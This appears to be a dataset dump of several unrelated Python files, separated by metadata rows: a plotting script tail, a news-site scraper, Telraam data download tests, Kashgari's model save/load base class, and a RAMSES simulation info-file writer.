    plt.title("Log model evidence vs initial alpha")
    plt.savefig(f"{SAVE_DIR}/{args.dataset}/{args.divergence}/{args.divergence}-generative-performance.pdf")
    plt.savefig(f"{SAVE_DIR}/{args.dataset}/{args.divergence}/{args.divergence}-generative-performance.png", dpi=200)

    # save tight-layout version:
    fig = plt.figure(figsize=(10, 10))
    plt.errorbar(initial_a, log_probs_mu, yerr=yerr_bar, label=args.divergence)
    for i in range(len(model_names)):
        plt.errorbar(initial_a, [log_probs_mu_i[i]] * len(initial_a), yerr=[yerr_bar_i[i]] * len(initial_a), label=model_names[i])
    plt.xlabel(r'Initial $\alpha$')
    plt.ylabel(r'$\log(p_{\theta}(X))$')
    plt.legend()
    plt.tight_layout(pad=1.0, w_pad=1.0, h_pad=1.0)
    plt.savefig(f"{SAVE_DIR}/{args.dataset}/{args.divergence}/{args.divergence}-generative-performance-tight-layout.pdf")
    plt.savefig(f"{SAVE_DIR}/{args.dataset}/{args.divergence}/{args.divergence}-generative-performance-tight-layout.png", dpi=200)


if __name__ == '__main__':
    args = parse_arguments(sys.argv[1:])
    main(args)
| 35.595628 | 130 | 0.623043 | 1,914 | 13,028 | 4.020899 | 0.173981 | 0.040541 | 0.014293 | 0.018191 | 0.436071 | 0.406055 | 0.373311 | 0.371232 | 0.371232 | 0.350442 | 0 | 0.02011 | 0.232806 | 13,028 | 366 | 131 | 35.595628 | 0.749875 | 0.209856 | 0 | 0.283582 | 0 | 0.00995 | 0.147047 | 0.079249 | 0 | 0 | 0 | 0 | 0.014925 | 1 | 0.029851 | false | 0 | 0.074627 | 0 | 0.129353 | 0.049751 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a467cffc666f7d4209f357092ce125a04accdd5 | 1,234 | py | Python | News_chat_bot/News_scraper.py | amansharmma/News_Chat_Bot | f3342da9f20c5ff9037111a358b4e70c294a6a5b | [
"MIT"
] | null | null | null | News_chat_bot/News_scraper.py | amansharmma/News_Chat_Bot | f3342da9f20c5ff9037111a358b4e70c294a6a5b | [
"MIT"
] | null | null | null | News_chat_bot/News_scraper.py | amansharmma/News_Chat_Bot | f3342da9f20c5ff9037111a358b4e70c294a6a5b | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
import requests
import datetime

top_news = {"world": [], "business": [], "technology": [], "sports": [], "entertainment": []}


def Scraper_news():
    URLS_of_menu = {"world": "http://www.newzcone.com/world/",
                    "business": "http://www.newzcone.com/business/",
                    "technology": "http://www.newzcone.com/technology/networking-telecom/",
                    "sports": "http://www.newzcone.com/sports/",
                    "entertainment": "http://www.newzcone.com/entertainment/"}
    # Format today's date as YYYY/MM/DD.
    today = str(datetime.date.today()).replace("-", "/")
    for key in URLS_of_menu:
        url = URLS_of_menu[key]
        html = requests.get(url)
        soup = BeautifulSoup(html.text, "html.parser")
        findingUrl = soup.findAll("div", class_="news-entry")
        for div in findingUrl:
            a_tags = div.findAll("a")
            count = 0
            # Scrape up to 5 article links per news block, skipping the first <a>.
            for a in a_tags[1:15]:
                new_dic = {}
                new_dic["Date"] = today
                new_dic["Discription"] = a.get_text().strip()  # key spelling kept for downstream consumers
                new_dic["News_URL"] = a["href"]
                html = requests.get(a["href"])
                needsoup = BeautifulSoup(html.text, "html.parser")
                new_dic["Title"] = needsoup.title.get_text().strip()
                # Append inside the loop so every article is kept, not just
                # the last one scraped from each block.
                top_news[key].append(new_dic)
                count += 1
                if count == 5:
                    break
    return top_news
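

# Usage sketch (illustrative only; requires network access to newzcone.com):
def _scraper_example():
    import json
    news = Scraper_news()
    # Inspect the scraped technology articles in a readable form.
    print(json.dumps(news["technology"], indent=2, ensure_ascii=False))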
| 33.351351 | 275 | 0.670178 | 172 | 1,234 | 4.668605 | 0.360465 | 0.044832 | 0.0934 | 0.11208 | 0.122042 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006554 | 0.134522 | 1,234 | 36 | 276 | 34.277778 | 0.745318 | 0 | 0 | 0 | 0 | 0 | 0.278994 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029412 | false | 0 | 0.058824 | 0 | 0.088235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a46d0a115b32d7ff6c6db2d71f59e05c37b173c | 2,388 | py | Python | telraam_data/tests/test_download.py | Duam/telraam-data | fd1bda4a0be3f858015470a6cb9a3d64e140ce32 | [
"MIT"
] | null | null | null | telraam_data/tests/test_download.py | Duam/telraam-data | fd1bda4a0be3f858015470a6cb9a3d64e140ce32 | [
"MIT"
] | null | null | null | telraam_data/tests/test_download.py | Duam/telraam-data | fd1bda4a0be3f858015470a6cb9a3d64e140ce32 | [
"MIT"
] | null | null | null | import telraam_data.query as query
import telraam_data.download as download
from .utils import get_data_keys
import datetime as dt
import shutil
import pandas as pd
import pathlib as pl
import random
import pytest


@pytest.fixture()
def one_segment():
    all_segments = query.query_active_segments()
    segment_idx = random.randrange(1, len(all_segments)) - 1
    return all_segments["features"][segment_idx]


@pytest.fixture()
def tmp_path():
    path = pl.Path('./tmp/data.csv')
    yield path
    shutil.rmtree('./tmp/')


def test_list_segments():
    # As of April 2020 there were more than 900 active segments.
    segments = download.list_segments()
    assert len(segments) > 900


def test_list_segments_by_coordinates():
    # As of April 2020 there are more than 30 active segments in Schaarbeek.
    segments = download.list_segments_by_coordinates(lon=4.373, lat=50.867, radius=2)
    assert len(segments) > 30
    # 1003073114 should be one of them
    assert 1003073114 in segments
    # 1003063473 should not be one of them
    assert 1003063473 not in segments


def test_download_one_segment(one_segment, tmp_path):
    segment_id = one_segment["properties"]["segment_id"]
    segment_last_time = one_segment["properties"]["last_data_package"]
    # Query that segment for the last live day
    end_date = dt.datetime.fromisoformat(segment_last_time).date()
    start_date = end_date - dt.timedelta(days=1)
    df = download.download_one_segment(
        segment_id=segment_id,
        start_date=start_date,
        end_date=end_date,
        out_filepath=tmp_path)
    required_keys = get_data_keys()
    required_keys.remove('date')  # 'date' has become the index

    # 1. Check returned data
    assert len(df) > 0
    assert df.index.name == 'date'
    assert (df.index >= str(start_date)).all()
    assert (df.index <= str(end_date + dt.timedelta(days=1))).all()
    assert set(required_keys) == set(required_keys).intersection(df.columns)
    assert (df['segment_id'] == segment_id).all()

    # 2. Check stored data
    df_local = pd.read_csv(tmp_path, parse_dates=["date"], index_col="date")
    from ast import literal_eval
    df_local.car_speed_hist_0to70plus = df_local.car_speed_hist_0to70plus.apply(literal_eval)
    df_local.car_speed_hist_0to120plus = df_local.car_speed_hist_0to120plus.apply(literal_eval)
    assert (df_local == df).all().all()
| 33.166667 | 95 | 0.725712 | 351 | 2,388 | 4.692308 | 0.327635 | 0.03643 | 0.024287 | 0.03643 | 0.173042 | 0.110504 | 0.03643 | 0 | 0 | 0 | 0 | 0.045132 | 0.174204 | 2,388 | 71 | 96 | 33.633803 | 0.790061 | 0.130235 | 0 | 0.04 | 0 | 0 | 0.048839 | 0 | 0 | 0 | 0 | 0 | 0.22 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.32 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a47a619909d8c68e7ff3f55a7292b76dc36728b | 4,544 | py | Python | kashgari/tasks/abs_task_model.py | SharpKoi/Kashgari | ef8c4b4d17dbd69616b9cc744489181909e313c3 | [
"Apache-2.0"
] | null | null | null | kashgari/tasks/abs_task_model.py | SharpKoi/Kashgari | ef8c4b4d17dbd69616b9cc744489181909e313c3 | [
"Apache-2.0"
] | null | null | null | kashgari/tasks/abs_task_model.py | SharpKoi/Kashgari | ef8c4b4d17dbd69616b9cc744489181909e313c3 | [
"Apache-2.0"
] | null | null | null | # encoding: utf-8

# author: BrikerMan
# contact: eliyar917@gmail.com
# blog: https://eliyar.biz

# file: abs_task_model.py
# time: 1:43 PM

import json
import os
import pathlib
from abc import ABC, abstractmethod
from typing import Dict, Any, TYPE_CHECKING, Union

import tensorflow as tf

import kashgari
from kashgari.embeddings import ABCEmbedding
from kashgari.logger import logger
from kashgari.processors.abc_processor import ABCProcessor
from kashgari.utils import load_data_object
from kashgari.layers import KConditionalRandomField

if TYPE_CHECKING:
    from kashgari.tasks.labeling import ABCLabelingModel
    from kashgari.tasks.classification import ABCClassificationModel


class ABCTaskModel(ABC):

    def __init__(self) -> None:
        self.tf_model: tf.keras.Model = None
        self.embedding: ABCEmbedding = None
        self.hyper_parameters: Dict[str, Any]
        self.sequence_length: int
        self.text_processor: ABCProcessor
        self.label_processor: ABCProcessor

    def to_dict(self) -> Dict[str, Any]:
        model_json_str = self.tf_model.to_json()
        return {
            'tf_version': tf.__version__,  # type: ignore
            'kashgari_version': kashgari.__version__,
            '__class_name__': self.__class__.__name__,
            '__module__': self.__class__.__module__,
            'config': {
                'hyper_parameters': self.hyper_parameters,  # type: ignore
                'sequence_length': self.sequence_length  # type: ignore
            },
            'embedding': self.embedding.to_dict(),  # type: ignore
            'text_processor': self.text_processor.to_dict(),
            'label_processor': self.label_processor.to_dict(),
            'tf_model': json.loads(model_json_str)
        }

    @classmethod
    def default_hyper_parameters(cls) -> Dict[str, Dict[str, Any]]:
        """
        The default hyper-parameters of the model as a dict; **all models must implement this function.**

        You can easily change a model's hyper-parameters.
        For example, change the LSTM units in BiLSTM_Model from 128 to 32:

        >>> from kashgari.tasks.classification import BiLSTM_Model
        >>> hyper = BiLSTM_Model.default_hyper_parameters()
        >>> print(hyper)
        {'layer_bi_lstm': {'units': 128, 'return_sequences': False}, 'layer_output': {}}
        >>> hyper['layer_bi_lstm']['units'] = 32
        >>> model = BiLSTM_Model(hyper_parameters=hyper)

        Returns:
            hyper params dict
        """
        raise NotImplementedError

    def save(self, model_path: str, encoding='utf-8') -> str:
        pathlib.Path(model_path).mkdir(exist_ok=True, parents=True)
        model_path = os.path.abspath(model_path)

        with open(os.path.join(model_path, 'model_config.json'), 'w', encoding=encoding) as f:
            f.write(json.dumps(self.to_dict(), indent=2, ensure_ascii=False))
            f.close()

        self.embedding.embed_model.save_weights(os.path.join(model_path, 'embed_model_weights.h5'))
        self.tf_model.save_weights(os.path.join(model_path, 'model_weights.h5'))  # type: ignore
        logger.info('model saved to {}'.format(os.path.abspath(model_path)))
        return model_path

    @classmethod
    def load_model(cls, model_path: str, encoding='utf-8') -> Union["ABCLabelingModel", "ABCClassificationModel"]:
        model_config_path = os.path.join(model_path, 'model_config.json')
        model_config = json.loads(open(model_config_path, 'r', encoding=encoding).read())
        model = load_data_object(model_config)

        model.embedding = load_data_object(model_config['embedding'])
        model.text_processor = load_data_object(model_config['text_processor'])
        model.label_processor = load_data_object(model_config['label_processor'])

        tf_model_str = json.dumps(model_config['tf_model'])
        model.tf_model = tf.keras.models.model_from_json(tf_model_str,
                                                         custom_objects=kashgari.custom_objects)

        if isinstance(model.tf_model.layers[-1], KConditionalRandomField):
            model.crf_layer = model.tf_model.layers[-1]

        model.tf_model.load_weights(os.path.join(model_path, 'model_weights.h5'))
        model.embedding.embed_model.load_weights(os.path.join(model_path, 'embed_model_weights.h5'))
        return model

    @abstractmethod
    def build_model(self,
                    x_data: Any,
                    y_data: Any) -> None:
        raise NotImplementedError
| 38.184874 | 114 | 0.665493 | 551 | 4,544 | 5.205082 | 0.274047 | 0.040795 | 0.020921 | 0.031381 | 0.222455 | 0.135983 | 0.095537 | 0.095537 | 0.059275 | 0.031381 | 0 | 0.007426 | 0.229533 | 4,544 | 118 | 115 | 38.508475 | 0.811768 | 0.166813 | 0 | 0.054795 | 0 | 0 | 0.09695 | 0.017974 | 0 | 0 | 0 | 0 | 0 | 1 | 0.082192 | false | 0 | 0.191781 | 0 | 0.328767 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a47bdd4053aca36705ed4d58e60c21aacfb2da2 | 1,915 | py | Python | pyram/utils/make_info_from_amr.py | Hoseung/pyRamAn | f9386fa5a9f045f98590039988d3cd50bc488dc2 | [
"MIT"
] | 1 | 2021-11-25T16:11:56.000Z | 2021-11-25T16:11:56.000Z | pyram/utils/make_info_from_amr.py | Hoseung/pyRamAn | f9386fa5a9f045f98590039988d3cd50bc488dc2 | [
"MIT"
] | 6 | 2020-02-17T13:44:43.000Z | 2020-06-25T15:35:05.000Z | pyram/utils/make_info_from_amr.py | Hoseung/pyRamAn | f9386fa5a9f045f98590039988d3cd50bc488dc2 | [
"MIT"
] | 1 | 2021-11-25T16:11:56.000Z | 2021-11-25T16:11:56.000Z |
# coding: utf-8

def write_info(amr):
    # import fortranformat as ff
    # nout = amr.nout
    # Note: ``nout`` and ``levelmin`` are taken from module scope; they are
    # set in the loop at the bottom of this file.
    aexp = amr.aexp
    h0 = amr.h0 * 1e-2
    rhoc = 1.88e-29
    boxlen = 1.0

    f = open("info_" + str(nout).zfill(5) + ".txt", 'w')
    for name, val in zip(["ncpu", "ndim", "levelmin", "levelmax", "ngridmax", "nstep_coarse"],
                         [amr.ncpu, amr.ndim, levelmin, amr.nlevelmax, amr.ngridmax, amr.nstep_coarse]):
        f.write("{:<12s}={:11d} \n".format(name, val))
    f.write("\n")

    # lineformat = ff.FortranRecordWriter('(1E23.15)')
    scale_d = amr.Om * rhoc * h0**2 / aexp**3
    scale_t = aexp**2 / (h0*1e5/3.08e24)
    scale_l = aexp * amr.boxlen * 3.08e24/(h0)
    for name, val in zip(["boxlen", "time", "aexp", "H0", "omega_m", "omega_l", "omega_k", "omega_b",
                          "unit_l", "unit_d", "unit_t"],
                         [boxlen, amr.t, aexp, h0, amr.Om, amr.Ol, amr.Ok, amr.Ob, scale_l, scale_d, scale_t]):
        f.write("{:<12s}={:.15E} \n".format(name, val))
    f.write("\n")

    f.write("ordering type=" + amr.ordering[0].decode("UTF-8"))
    f.write("\n DOMAIN ind_min ind_max \n")
    for i in range(amr.ncpu):
        f.write("{:8d} {:.15E} {:.15E}\n".format(i+1, amr.bound_key[i], amr.bound_key[i+1]))
    f.close()
"""
This can generate 'header' of info.
But it is not trivial to read 128-bit floating point (QUADHILBERT) numbers from binary bits in Python.
Instead, I used a fortran program to read amr.00001 and output hilbert keys in the info format.
"""
wdir = "./"
from pyram import load
nouts = range(113, 120)
for nout in nouts:
ah = load.sim.AmrHeader()
snout = str(nout).zfill(5)
ah._read_amr_header(open(wdir + "output_"+snout+"/amr_"+snout+".out00001", 'rb'), skip_header=False)
levelmin = 8 # From other info file
write_info(ah)
| 31.393443 | 111 | 0.565535 | 289 | 1,915 | 3.650519 | 0.449827 | 0.03981 | 0.019905 | 0.024645 | 0.068246 | 0.03981 | 0.03981 | 0 | 0 | 0 | 0 | 0.053408 | 0.256919 | 1,915 | 60 | 112 | 31.916667 | 0.687983 | 0.06423 | 0 | 0.0625 | 0 | 0 | 0.178687 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.03125 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |